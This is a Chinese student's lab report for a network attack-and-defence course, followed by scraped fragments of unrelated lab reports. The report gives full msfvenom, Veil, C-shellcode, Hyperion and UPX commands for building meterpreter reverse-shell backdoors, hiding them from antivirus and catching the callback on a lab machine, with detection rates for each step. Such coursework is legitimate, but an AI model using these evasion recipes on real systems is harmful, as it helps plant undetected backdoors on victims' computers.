20212413 2023-2024-2 《网络与系统攻防技术》实验三实验报告

20212413贺钟剑 2024-04-03 18:06:19

20212413 2023-2024-2 《网络与系统攻防技术》实验三实验报告

目录

  • 20212413 2023-2024-2 《网络与系统攻防技术》实验三实验报告
  • 目录
  • 1.实验内容
  • 2.实验过程
  • 2.1正确使用msf编码器,veil-evasion,利用shellcode编程等免杀工具或技巧
  • 2.2 veil
  • 2.3 使用C + shellcode编程
  • 2.4 通过组合应用各种技术实现恶意代码免杀
  • 2.5 用另一电脑实测,在杀软开启的情况下,可运行并回连成功
  • 3.实验问题及解决方案
  • 4.问题回答
  • 4.学习感悟思考

1.实验内容

1.我们会用到msf编码器来编码恶意代码,然后用msfvenom生成像jar、py这样的文件。同时,我们还会用veil和加壳工具来隐藏恶意代码,让它更不容易被发现。我们还会用C语言和shellcode进行编程,来制作更高级的恶意代码。
2.我们会结合使用多种技术,让恶意代码能够不被杀毒软件识别和杀掉。
3.我们会用另一台电脑来测试这些恶意代码,在杀毒软件开启的情况下,看看这些代码是否能够成功运行并返回连接。

2.实验过程

2.1正确使用msf编码器,veil-evasion,利用shellcode编程等免杀工具或技巧

步骤1:首先将主机的病毒和威胁防护关掉,再将虚拟机的防火墙关掉,否则最后无法反弹连接。

img

img

步骤2:根据实验二,kali虚拟机生成一个后门传到主机上,使用VirusTotal、Virscan来检测后门,如图所示,VirusTotal的检出率为59/72,Virscan的检出率为27/47。

img

img

img

步骤3:使用 msfvenom --list encoders 命令查看Metasploit的编码器。

img

步骤4:使用x86/shikata_ga_nai对后门程序进行一次编码,使用命令如下:

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.238.132 LPORT=1215 -f exe > 20212413backdoor.exe

  • 192.168.56.112为Windows反弹回连Kali的IP地址

  • -e 指定编码器,可以通过-l encoders查看所有编码器

  • -b :设置payload中需要避免的字符

再次使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为56/72,Virscan的检出率为21/47,可以发现,仅进行一次编码对于实现免杀并没有实质性作用。

img

img

img

步骤5:通过x86/shikata_ga_nai对后门程序多次编码的方法进行免杀,使用命令如下:

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.238.132 LPORT=1215 -f exe > 20212413backdoor.exe

  • -i 指定编码迭代的次数

再次使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为56/72(不变),Virscan的检出率为19/47(降低),可以发现,进行十次编码对于实现免杀并没有实质性作用。

img

img

img

步骤6:接下来,我们尝试通过不同编码器组合多次编码的方法进行免杀,使用命令如下:

-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.238.132 LPORT=1215 -f raw | msfvenom -a x64 --platform windows -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -a x64 --platform windows -e x86/alpha_upper -i 5 -f raw | msfvenom -a x64 --platform windows -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -a x64 --platform windows -e x86/countdown -c 5 -f exe > 20212413backdoor.exe

再次使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为54/72,Virscan的检出率为20/47,可以发现进行混合多次编码对于实现免杀并没有实质性作用。

img

img

img

步骤7:在主机下载Process Explorer,将文件夹解压后传输至kali虚拟机上,进入kali虚拟机中的Process Explorer.exe所在目录,使用命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp -x procexp.exe LHOST=192.168.238.132 LPORT=1215 -f exe > 20212413backdoor.exe

  • -x :使用一个可执行文件当作模板
    使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为23/72,Virscan的检出率为9/47,可以发现模板为Process Explorer后杀毒软件检出率有所下降。

img

img

img

步骤8:生成.jar格式的文件,由于要生成jar包,所以payload我们应该使用java/shell_reverse_tcp,使用命令如下:

msfvenom -p java/shell_reverse_tcp LHOST=192.168.238.132 LPORT=1215 -f jar > 20212413backdoor.jar

使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为32/61,Virscan的检出率为12/47,可以发现文件格式为.jar后杀毒软件检出率相比.exe格式有所下降。

img

img

img

步骤9:生成.php格式的文件,使用php/meterpreter/reverse_tcp,且文件格式应选择raw,使用命令如下:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.238.132 LPORT=1215 -f raw > 20212413backdoor.php

使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为24/60,Virscan的检出率为9/47,可以发现文件格式为.php后杀毒软件检出率相比.exe格式有所下降。

img

img

img

步骤10:生成.py格式的文件,使用python/meterpreter/reverse_tcp,使用命令如下:

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.238.132 LPORT=1215 > 20212413backdoor.py

使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为17/61,Virscan的检出率为4/47,可以发现,更改文件格式为.py后杀毒软件检出率相比.exe格式有所下降。

img

img

img

2.2 veil

步骤1:首先我们要安装veil,经实测,kali虚拟机2022/2的版本可以成功安装(现IP地址为192.168.238.132)。依次输入以下命令:

  • apt-get install pip

  • apt-get install git

  • apt-get install veil

  • veil

  • /usr/share/veil/config/setup.sh -force-silent (一路点next)

img

img

img

img

img

img

步骤2:安装好veil后,在终端中依次输入以下命令生成后门程序:

  • Veil>: use evasion # 使用evasion工具

  • Veil/Evasion>: use c/meterpreter/rev_tcp.py

  • [c/meterpreter/rev_tcp>>]: set LHOST 192.168.238.131

  • [c/meterpreter/rev_tcp>>]: set LPORT 8000

  • [c/meterpreter/rev_tcp>>]: generate

  • 20212413veil

使用VirusTotal、Virscan来检测生成的后门程序,如图所示,VirusTotal的检出率为46/72,Virscan的检出率为17/47,可以发现,更改文件格式为.py后杀毒软件检出率相比.exe格式有所下降。

img

img

img

img

img

img

2.3 使用C + shellcode编程

步骤1:首先使用metasploit生成用于反弹连接获取shell的shellcode,并以C语言格式输出,命令如下:

  • msfvenom -p windows/meterpreter/reverse tcp LHosT=192.168.238.131 LPORT=8000 -f c>20212413shellcode.c

接着使用如下命令添加主函数:

cat >>20212413shellcode.c<<EOF
int main(){
    int (*func)() = (int(*)())buf;
    func();
}
EOF

然后将生成的C源代码使用交叉编译的方法编译成Windows的可执行程序,命令如下:

  • i686-w64-mingw32-gcc 20212413shellcode.c -o 20212413shellcode.exe
交叉编译工具链的命名规则为:arch [-vendor] [-os] [-(gnu)eabi]
arch - 体系架构,如ARM,MIPS,i686
vendor - 工具链提供商
eabi - 嵌入式应用二进制接口(Embedded Application Binary Interface)

最后使用VirusTotal、Virscan来检测编译后的后门程序,如图所示,VirusTotal的检出率为42/72,Virscan的检出率为14/47,可以发现,使用C + Shellcode编程得到的程序检出率有所下降

img

img

img

img

img

2.4 通过组合应用各种技术实现恶意代码免杀

步骤1:首先使用C + Shellcode技术生成C源代码文件,在生成命令中使用编码器x86/shikata_ga_nai进行10次编码,命令如下:

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.238.1 LPORT=8000 -f c > 20212413shellcode.c

使用如下命令添加主函数:

cat >>20212413shellcode.c<<EOF
int main(){
    int (*func)() = (int(*)())buf;
    func();
}
EOF

将生成的C源代码使用交叉编译的方法编译成Windows的可执行程序,命令如下:

  • i686-w64-mingw32-gcc 20212413shellcode.c -o 20212413shellcode.exe

使用hyperion给程序加上一层加密壳,命令如下:

  • wine /usr/share/windows-resources/hyperion/hyperion.exe -v 20212413shellcode.exe 20212413shellcode.hyed.exe

使用upx给程序加上一层压缩壳,命令如下:

  • upx 20212413shellcode.hyed.exe -o 20212413shellcode.upxed.exe

将生成的可执行程序传到Windows上,使用杀毒软件(金山毒霸青春版)进行扫描,结果没有报毒,如图所示:

img

img

img

img

img

img

2.5 用另一电脑实测,在杀软开启的情况下,可运行并回连成功

步骤1:先确定有没有关虚拟机的防火墙,没有关返回实验准备。

步骤2:在Kali上的终端输入命令msfconsole打开msf控制台,等待程序初始化完成后输入以下指令获取Windows的Shell:

use exploit/multi/handler                                                    # 进入监听模块
# [*] Using configured payload generic/shell_reverse_tcp
set payload windows/meterpreter/reverse_tcp                 # 设置攻击载荷为64位Windows的反弹TCP连接
# payload => windows/meterpreter/reverse_tcp
set LHOST 192.168.238.132                                           # 设置Kali的IP地址,与后门的LHOST参数保持一致
# LHOST => 192.168.238.132
set LPORT 8000                                                              # 设置端口号,与后门的LPORT参数保持一致
# LPORT => 8000
exploit
# [*] Started reverse TCP handler on 192.168.238.132:8000
msf6 exploit(multi/handler)>exploit

img

步骤3:执行主机上的后门。

步骤4:后门程序成功实现反弹连接,如图所示,使用命令net start | findstr "McAfee"查看McAfee。这里使用了McAfee提供支持的联想杀毒Plus,版本为16.0。

img

img

img

3.实验问题及解决方案

问题一:无法安装veil。
问题一的解决方案:换老版本的kali虚拟机,我选的是2022/2版本的,应该是之后更新的版本虚拟机镜像源有问题。

问题二:虚拟机和主机没有反弹连接成功。
问题二的解决方案:关闭虚拟机的防火墙,检查自己虚拟机IP地址是否发生变化。

4.问题回答

(1)杀软是如何检测出恶意代码的?
答:
1.基于特征码的检测:
杀软内置了一个病毒特征库,其中记录了各种已知病毒的特征信息,如病毒文件名、文件大小、文件的MD5值或特定的字节序列、指令模式等。
当扫描文件时,杀软会将待扫描的文件与病毒特征库进行比对,以确定文件是否包含与已知病毒相同的特征。
这种方法对于已知病毒非常有效,但需要不断更新病毒特征库以应对新出现的恶意代码。
2.实时监控:
杀软在后台运行,实时监控计算机系统中的文件活动、进程行为、网络传输等。
当发现可疑的文件操作、注册表修改或网络通信时,杀软会进行进一步的检测和拦截。
启发式恶意软件检测:
启发式检测是一种基于行为分析的方法,它并不完全依赖于已知病毒的特征。
杀软会分析程序的行为模式,如是否修改系统文件、是否进行大量的网络通信、是否尝试隐藏自身等。
如果程序的行为与恶意代码的行为模式相符,杀软会将其标记为可疑并进行进一步的处理。
沙箱技术:
某些杀软使用沙箱技术来模拟运行可疑文件,观察其在隔离环境中的行为。
通过观察文件在沙箱中的行为,杀软可以判断其是否包含恶意代码。
云安全:
现代杀软常常结合云安全技术,将扫描结果上传到云端进行比对和分析。
云端数据库可以实时更新,并提供更全面的恶意代码检测能力。
补丁管理:
恶意代码常常利用系统和应用程序的漏洞进行攻击。因此,保持系统和应用程序的补丁更新也是预防恶意代码攻击的重要手段。

(2)免杀是做什么?
答:
免杀技术的主要内容基本上是通过修改病毒、木马的内容来改变其特征码,从而躲避杀毒软件的查杀。常见的免杀技术包括修改特征码、花指令免杀以及加壳免杀等。例如,修改特征码免杀是通过修改病毒特征码来躲过杀毒软件的扫描;花指令免杀可能会用到各种指令,如jmp、call、ret的堆栈技巧,以及位置运算等;而加壳免杀则是通过加密壳来掩盖特征码,使杀毒软件难以检测。
免杀技术通常被用于恶意目的,以规避安全检测,这是不道德和非法的行为。对于普通用户来说,了解免杀技术的主要目的是为了增强网络安全意识,更好地防范恶意代码的攻击。因此,应遵守法律和道德规范,不要尝试使用或传播免杀技术。

(3)免杀的基本方法有哪些?
答:
修改特征码:
直接修改特征码的十六进制法:把特征码所对应的十六进制改成数字差1或差不多的十六进制。这种方法需要精确定位特征码所对应的十六进制,并在修改后进行测试以确保能够正常使用。
修改字符串大小写法:如果特征码所对应的内容是字符串,可以通过互换大小写来修改。但这种方法仅适用于特征码内容为字符串的情况。
等价替换法:将特征码所对应的汇编指令命令替换为功能类似的指令。这需要特征码中有可以替换的汇编指令。
指令顺序调换法:互换具有特征码的代码顺序。
指令免杀:
使用各种指令技巧,如jmp、call、ret的堆栈技巧以及位置运算等,以干扰杀毒软件的检测。
加壳免杀:
使用加密壳来掩盖特征码。加密壳可以将特征码全部掩盖,但某些常见版本的壳可能会被直接脱掉分析。
加冷门壳:使用那些特征未被分析、不能自动脱壳的冷门壳,以更好地隐藏原始代码,达到免杀效果。
其他技术:
替换资源:使用工具如ResHacker替换无用的资源(如Version等)。
加签名:使用签名伪造工具,将正常软件的签名信息加入到自己软件中。
增加节:增加节数据,随意加入无效数据,或者通过加密器/压缩器将原始代码进行加密压缩,然后组装上解密器/解压器到文件中。

4.学习感悟思考

    在这次学习过程中,我深入探索了免杀技术的实践应用,特别是正确使用msf编码器、veil-evasion等免杀工具,以及利用shellcode编程等技巧。
    首先,我学习了msf编码器的使用方法,并通过msfvenom生成了jar等不同类型的文件。这一过程不仅锻炼了我的编码技能,也让我对免杀原理有了更深刻的理解。同时,我还尝试了veil加壳工具,进一步增强了代码的隐蔽性。
    在C语言结合shellcode编程的实践中,我深刻体会到了编程的复杂性和挑战性。然而,当成功编写出能够绕过杀毒软件的代码时,那种成就感是无法言表的。
    通过组合应用这些技术,我成功实现了恶意代码的免杀。其原理主要是通过修改代码特征、增加混淆代码等方式,使杀毒软件无法准确识别。然而,与杀软共生的结果验证仍需截图记录,以确保实验结果的准确性和可靠性。
    最后,我在另一台电脑上进行了实测。在杀软开启的情况下,我的恶意代码仍能成功运行并回连。这次实验让我更加确信,只要掌握正确的技术和方法,就可以在一定程度上绕过杀毒软件的检测。
    通过这次学习,我不仅提升了技术水平,也加深了对网络安全的认识。未来,我将继续深入研究免杀技术,为网络安全事业贡献自己的力量。
...全文
44 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验二 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验三 网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第二至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验二:认识性实验 本实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图
网络安全实验 石河子大学信息科学与技术学院 网络安全课程实验 "实验名称: "使用任选工具进行网络检测与扫描 " "学生姓名: "刘金红 " " "学 号: "05 " " "学 院: "信息科学与技术学院 " "专业年级: "计算机科学与技术专业2012级 " "指导教师: "曹传东老师 " "完成日期: " " 目录 1 实验环境 3 2 实验目的 3 3 实验步骤 3 4 实验内容 4 DOS窗口中常用网络命令的操作使用及IPCS攻击实践 4 DOS窗口中ping 命令及其常见带参数子命令的用法实践 4 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 6 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 8 DOS窗口中netstat命令及其常见带参数子命令的用法实践 10 DOS窗口中arp命令及其常见带参数子命令的用法实践 12 DOS窗口中route命令及其常见带参数子命令的用法实践 13 DOS窗口中tracert命令及其常见带参数子命令的用法实践 14 DOS窗口中ftp命令及其常见带参数子命令的用法实践 15 DOS窗口中telnet命令及其常见带参数子命令的用法实践 16 DOS窗口中sc命令及其常见带参数子命令的用法实践 20 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 22 DOS窗口中net命令及其常见带参数子命令的用法实践 24 DOS窗口中at命令及其常见带参数子命令的用法实践 25 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测 25 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名, 并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举猜 解某个用户的口令(爆破); 25 使用Port Scan 工具软件进行对某目标机开放端口的扫描; 28 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息; 31 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证; 32 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检测; 36 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息; 39 使用自选的任一款扫描工具进行网络攻击前的信息收集 42 使用CIS工具对本机系统进行安全风险评估 42 使用Superscan扫描工具实现秘密端口扫描 44 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中 主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端) "操作系统 "Windows系列操作系统,版本均可,推荐Win7/Windows XP " "Telnet客户端 "F-Term(版本不限)或 " "工具 " " "FTP客户端工具"Cute FTP pro/Flash FXP (版本不限)或 " "Web浏览器 "IE/Mozilla FireFox(版本不限)或其他浏览器软件 " "抓包软件 "Sniffer Pro 支持千兆网卡) " "屏幕截图工具 "HyperSnap-DX (可抓滚屏的单文件版本) " "IP地址 " (机房做的) (后来改了) " 虚拟机配置如下表1-2所示: 表1-2 虚拟机环境:虚拟机操作系统的配置(作为服务器端) "操作系统 "Windows 200X Advance " " "Server,且安装配置了WWW/FTP/DNS/Telnet等网络服务 " "IP地址 " " 2 实验目的 1. 通过该实验,掌握在DOS命令窗口中常用网络命令的使用方法; 2. 通过该实验,掌握利用教程第四章介绍的各个案例中的工具软件进行网络检测扫描的 基本方法; 3. 通过该实验,掌握使用自选的一款工具软件进行网络攻击前的信息收集的基本方法; 4. 进一步加深对TCP/IP协议的理解和认识; 3 实验步骤 1. 实验前先阅读材料相关章节以及实验一参考资料(PPT及命令简介文档、实验指导书) ,充分预习,了解实验步骤并准备相关的工具软件; 2. 每个人在自己的本机系统上安装各种工具软件,以自己的虚拟机系统作为扫描目标; 3. 在各工具软件中分别进行参数设置,以实现客户机端获取靶机服务器的各种信息; 4. 在虚拟机系统中启动Sniffer Pro 或Wireshark,进行数据包捕获模式,抓取攻防双方的各种通信协议数据包,查看数 据包中的各种敏感扫描信息的报文内容; 5. 独立完成本次实验报告; 6. 实验完成后,思考以下问题,如何防范对方从网络上获得自己机器的各种信息 4
xxxxxxx 学生实习(实训)总结报告 学 院:xxxxxxxxxxxxxxxxxx 专业班级:_xxxxxxxxxx_ 学生姓名:____xxxxxxxxx_____ 学 号:xxxxxxxxxx_ 实习(实训)地点:___xxxxx____ ____________ __ 报告题目:__xxxxxxxxxxxxxxxxxxxx__________ ____ 报告日期: xxx 年 xxx月 xxx日 指导教师评语: ____________ _______________________ ______________________________________________________________________ ______________________________________________________________________ ___________________ 成绩(五级记分制):______ _______ 指导教师(签字):_____________________ xxxxx 实习(实训)任务书 设计题目:数据恢复技术应用 "学生姓名 "xxxxx " "课程名称 "xxxxx "专业班级 "xxxxx " "地 点 "xxxxx "起止时间 "xxxxx " "设 "数据恢复是在系统数据丢失或其他诸多原因而导致的灾难后,快速进" "计 "行数据恢复,以保障系统正常运行的常用手段。通过该综合训练,使" "内 "学生了解数据恢复的重要性,并认识到电磁泄漏现象引起的数据恢复" "容 ",硬件损坏、文件的删除等实现数据恢复的内容。 " "及 "要求:理解数据备份的重要性,以及磁盘数据恢复的原理,认识数据" "要 "恢复技术对信息安全的影响。能够使用数据恢复软件EasyRecovery进" "求 "行文件恢复。 " " "提高要求:能够对磁盘数据进行彻底清除。 " "设 "掌握EasyRecovery的应用; " "计 "理解磁盘分区的原理及特征; " "参 "设计利用EasyRecovery或手动方法进行数据恢复的解决方案。 " "数 " " "进 "12月19-20日:了解设计任务、掌握磁盘分区特征、熟悉工具软件;" "度 "12月21-28日:数据恢复的实施; " "要 "12月29-30日:撰写综合训练总结报告,作品检查、提交、答辩。 " "求 " " "参 "[1] 吴灏.《网络攻防技术》[M].北京:机械工业出版社,2009. " "考 "[2]胡建伟.《网络安全与保密》[M]. 西安电子科技大学出版社,2006." "资 "[3]牛少彰,江为强.《网络的攻击于防范——理论与实践》[M]. 北京: " "料 "北京邮电大学出版社,2006. " " "[4] 蒋朝惠. 《信息安全综合实验》[M]. " " "北京:中国铁道出版社,2010. " " "[5] 蒋朝惠. 《信息安全原理与技术》[M]. " " "北京:中国铁道出版社,2009. " "其 " " "它 " " "说 " " "明 "1.本表应在每次实施前一周由负责教师填写二份,院系审批后交院 " " "系办备案,一份由负责教师留用。2.若填写内容较多可另纸附后。3" " ".一题多名学生共用的,在设计内容、参数、要求等方面应有所区别 " " "。 " 系主任: 指导教师:xxxxx 年 月 日 前言 随着计算机技术的发展,同时硬盘由于其容量大价格便宜也成为人们存储数据的主要 设备。然而由于种种原因,硬盘的数据可能会被损坏,这也给个人和社会带来很大的损 失。因此,数据损坏后的数据恢复显得非常重要。虽然在数据恢复领域有很多的厂商已 经有比较成熟的技术。然而对于并不了解硬盘原理普通人来说,如果试图恢复数据,但 又无法采用很好的方法,选择正确的工具,就很难很好的恢复数据。然而不管用什么方 法进行数据恢复,都不能保证100%的能成功,所以在使用电脑时,我们应该注意数据备 份工作。 本文分析了硬盘的有关内部结构与文件存储系统以及硬盘数据损坏的有关原因,然后 介绍如何使用数据恢复软件EasyRecovery进行文件恢复。 目录 前言 I 1 设计内容及要求 1 实训内容 1 实训要求 1 2 数据恢复原理 2 3 数据恢复常见实例 4 主引导区的恢复 4 分区表破坏修复 5 DBR修复 5 文件删除后的修复 6 因病毒侵害而导致的文件丢失 6 利用EasyRecovery恢复丢失文件 7 4 总结 14 致谢 15 参考文献 16 1 设计内容及要求 硬盘数据丢失对于硬盘来说,仅仅就是硬盘上的某些地方的磁性消失。硬盘数据的丢 失的原因本来就有很多种,可能因为人的误操作而丢失,也可能是因为病毒的入侵而破 坏数据。并且

69

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧